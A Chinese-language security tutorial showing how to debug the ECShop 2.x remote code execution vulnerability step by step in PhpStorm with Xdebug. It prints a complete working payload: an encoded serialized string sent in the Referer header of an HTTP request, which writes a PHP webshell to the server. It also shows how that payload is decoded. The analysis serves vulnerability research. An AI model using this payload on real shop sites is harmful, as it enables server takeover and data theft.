号称国内最大的开源网店系统,可以直接远程写入webshell。
本文会通过动态分析来解析漏洞每个细节,关于漏洞原理可以看 漏洞原理 ,讲的很详细,本文重点介绍动态分析审计的技巧和如何调试漏洞,关于漏洞本身也是一个很值得学习的漏洞,能构造出这个攻击链是需要对每个细节都有深刻的认识才能实现的。
二、动态调试环境搭建自行下载安装phpstudy和phpstorm
首先确定php版本
然后修改配置文件
data:image/s3,"s3://crabby-images/d1d09/d1d095bfc418dbe9bd06142da8a2fa714a259675" alt="Ecshop2.x代码执行漏洞动态调试分析"
修改php.ini中如下
[XDebug] xdebug.profiler_append = 0 xdebug.profiler_enable = 1 xdebug.profiler_enable_trigger = 0 xdebug.profiler_output_dir ="C:\phpStudy\tmp\xdebug" xdebug.trace_output_dir ="C:\phpStudy\tmp\xdebug" xdebug.profiler_output_name = "cache.out.%t-%s" xdebug.remote_enable = 1 xdebug.remote_handler = "dbgp" xdebug.remote_host = "127.0.0.1" zend_extension="C:\phpStudy\php53\ext\xdebug.dll" xdebug.remote_port=9000 xdebug.idekey= PHPSTROM设置php版本,一定要对应上
data:image/s3,"s3://crabby-images/a102c/a102caf42b18cb5299db9a633fe4d17bc1539fe2" alt="Ecshop2.x代码执行漏洞动态调试分析"
下面图片是默认的不用动
data:image/s3,"s3://crabby-images/b3dd7/b3dd7494f952530040cf54caf7a711a19ed24e65" alt="Ecshop2.x代码执行漏洞动态调试分析"
下面的修改key和端口如下
data:image/s3,"s3://crabby-images/be4da/be4dadb5e877b0a7452ccc1796fd8836e306ca94" alt="Ecshop2.x代码执行漏洞动态调试分析"
data:image/s3,"s3://crabby-images/d979d/d979dc1bcffc9e4229635cd665fffc71a5489843" alt="Ecshop2.x代码执行漏洞动态调试分析"
在这里配置根目录调试环境
data:image/s3,"s3://crabby-images/9d578/9d57858375a036952ba354097eb5659ccafb5840" alt="Ecshop2.x代码执行漏洞动态调试分析"
data:image/s3,"s3://crabby-images/40ca1/40ca1cc52b87e37b5558737792cf7ad727b78067" alt="Ecshop2.x代码执行漏洞动态调试分析"
这里就留一个Chrome浏览器
data:image/s3,"s3://crabby-images/dbb83/dbb830c1872d1f93d61bc6ff89afdd484feb9003" alt="Ecshop2.x代码执行漏洞动态调试分析"
Chrome浏览器要安装插件JetBrains IDE Support 下载安装好了不用修改配置,这样就基本可以了。
三、漏洞动态调试分析下面进行动态分析,动态分析的好处就是漏洞分析起来更加清晰。
data:image/s3,"s3://crabby-images/45112/45112cd26c6fb065a614d4181832386f89cc9126" alt="Ecshop2.x代码执行漏洞动态调试分析"
下断点这里我们断到了漏洞起始点方便分析每一个细节,然后点击debug,
然后浏览器会打开
data:image/s3,"s3://crabby-images/faeb7/faeb7f0ed0a50405318ff192a8a0e4bd0ea380fc" alt="Ecshop2.x代码执行漏洞动态调试分析"
然后点击登录,会触发断点,可以看到停到了断点处
data:image/s3,"s3://crabby-images/2230f/2230f956ee13b910c1e1d9866b86021526bacb87" alt="Ecshop2.x代码执行漏洞动态调试分析"
下面介绍使用的一些快捷键:
f7会跟进函数 ,
f8 步出也就是一行一行走,不进入函数,有些循环或者不想看的函数直接f8,
进入函数后想跳出去就用shift+f8
Ctrl+art加 点击想要看的函数就会进入
Alt +f7 会搜索谁调用了这个函数或者变量
笔者常用的就这些,掌握这些技能后就可以调试
这里HTTP_REFFER可控到赋值到$back_act
data:image/s3,"s3://crabby-images/b4b61/b4b617e4fdc005e68a6e14a7971933a03d588c2b" alt="Ecshop2.x代码执行漏洞动态调试分析"
我们先用burp抓包测试下漏洞 ,先分析下payload
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}554fcae493e564ee0dc75bdf2ebf94caads 这串可以分解成两块,一个是554fcae493e564ee0dc75bdf2ebf94ca,一个是ads,ads是控制函数流程进入到insert_ads函数,554fcae493e564ee0dc75bdf2ebf94ca前面的这个就是个hash,后面会对它判断,判断后会把它去掉,没有它是进入不了攻击链的,后面再动态分析过程会介绍到。
后面的编码部分解开是这样
{$asd'];assert(base64_decode('file_put_contents('1.php','<?php eval($_POST[1337]); ?>')'));//}xxx发包
GET /upload/user.php?act=login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS[visit_times]=1 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} Connection: close Upgrade-Insecure-Requests: 1data:image/s3,"s3://crabby-images/a1a4f/a1a4f991375ca5a609192a7418d67d727309825f" alt="Ecshop2.x代码执行漏洞动态调试分析"
可以看的成功写入webshell
data:image/s3,"s3://crabby-images/95ae9/95ae9fad54b6a3e1da8f27ae56cccc3b1b773a9c" alt="Ecshop2.x代码执行漏洞动态调试分析"
然后我们继续调试,我们先一路f8走到这里,然后再f7进入看看
data:image/s3,"s3://crabby-images/22c17/22c173335777940ccd679c5d4757fd25b61f0984" alt="Ecshop2.x代码执行漏洞动态调试分析"
这里的关键点是insert_mod,动态调用,因为我们没办法抓包发送payload测试,所以这里面我们需要自己修改参数让流程按照payload攻击链来执行,攻击链中需要执行insert_ads,下面的有个hash判断
data:image/s3,"s3://crabby-images/ba2b1/ba2b12657c82e8032cf326835e6a72b9cc6f088c" alt="Ecshop2.x代码执行漏洞动态调试分析"
下面的可以看到有这个hash,所以这里不需要控制,然后继续流程
data:image/s3,"s3://crabby-images/60740/60740e0ba1cdd039fb9457de4183e5e6e744e7e2" alt="Ecshop2.x代码执行漏洞动态调试分析"
data:image/s3,"s3://crabby-images/6a0dc/6a0dc42856a5d98ca93611c9e23bce1a8057024a" alt="Ecshop2.x代码执行漏洞动态调试分析"
下面图片中会把hash去掉然后剩下$k,$k中的1,3,5,7都可以控制,所以这里我们在1修改它的值为我们的payload,右键点击setvalue
data:image/s3,"s3://crabby-images/fcc75/fcc752e9d46010466f66c08d79a2fe707d0832f3" alt="Ecshop2.x代码执行漏洞动态调试分析"
把这payload重新复制,右键setValue,这里直接复制会报错,还是一点点修改吧,然后双引号要转义
ads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}data:image/s3,"s3://crabby-images/a421e/a421e761d9362ccf1ce29a43d46d6feafe68b3d0" alt="Ecshop2.x代码执行漏洞动态调试分析"
继续f7进入到insert_mod里面,然后发现,insert_ads函数已经控制了,但是payload被反序列化时候$para为false,说明我们的payload有问题,点击debug重新来。
data:image/s3,"s3://crabby-images/64c0a/64c0a93ab062cf5d904029819a5acbb495c839b6" alt="Ecshop2.x代码执行漏洞动态调试分析"
换了个位置修改,在反序列化函数之前修改,下面图片可以看到$para有值了,是我们的payload
data:image/s3,"s3://crabby-images/f9a70/f9a70f9465321a2ac01fb0d195f0e73c6d751a0f" alt="Ecshop2.x代码执行漏洞动态调试分析"
继续走来到了insert_ads,一路f8,让我们的payload代入进了变量num
最后拼接成了这样
data:image/s3,"s3://crabby-images/6a424/6a424853624f519da945b51852611ae55309410b" alt="Ecshop2.x代码执行漏洞动态调试分析"
继续往下走,一路f8来到这里
data:image/s3,"s3://crabby-images/41bb2/41bb2b7d793f9b2a3282a7667d5a45612301b8c1" alt="Ecshop2.x代码执行漏洞动态调试分析"
然后f7进入看看,会把payload代入_eval代码执行函数,在这里payload还会被fetch_str处理,f7进入看看
data:image/s3,"s3://crabby-images/2d33e/2d33e3dc791e7d3e182428359272f382dcccb4dc" alt="Ecshop2.x代码执行漏洞动态调试分析"
F8来到这里,在这里之前source都没有变化,经过了preg_replace会处理掉{
payload变成$asd’;]assertxxx 代入到了select里
这个select函数跟入不进去,只能静态分析下了,可以这样寻找ctrl+shift+f
data:image/s3,"s3://crabby-images/7d9b3/7d9b35b7663d9485408317378799db285cee1238" alt="Ecshop2.x代码执行漏洞动态调试分析"
在select中进入了get_val,substr去掉了$
data:image/s3,"s3://crabby-images/49818/498182d77e39ebbe318cf5dc8feb271ccf940a6e" alt="Ecshop2.x代码执行漏洞动态调试分析"
Payload变成了:asd’;]assertXXX
进入到了make_var
data:image/s3,"s3://crabby-images/54c36/54c36c44663f3e12f60d90df58314ccd8926e997" alt="Ecshop2.x代码执行漏洞动态调试分析"
最后拼接到了
data:image/s3,"s3://crabby-images/249b4/249b480af2809f2afb241f654ccf138e1d3953fc" alt="Ecshop2.x代码执行漏洞动态调试分析"
最终payload变成
$this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//']最后来到eval
data:image/s3,"s3://crabby-images/c2231/c2231099443b9bbd64d423ebc5553dd3d1407e49" alt="Ecshop2.x代码执行漏洞动态调试分析"
这里再走一下就把shell写进去了
四、总结通过动态分析的方式可以很简单的理解漏洞的攻击过程,可以清楚的了解payload在每个环节的处理过程,同时也方便我们进行进一步的修改和测试,对payload的构造能力进一步提升,希望能帮助到大家。
*本文作者:alphalab,转载请注明来自CodeSec.Net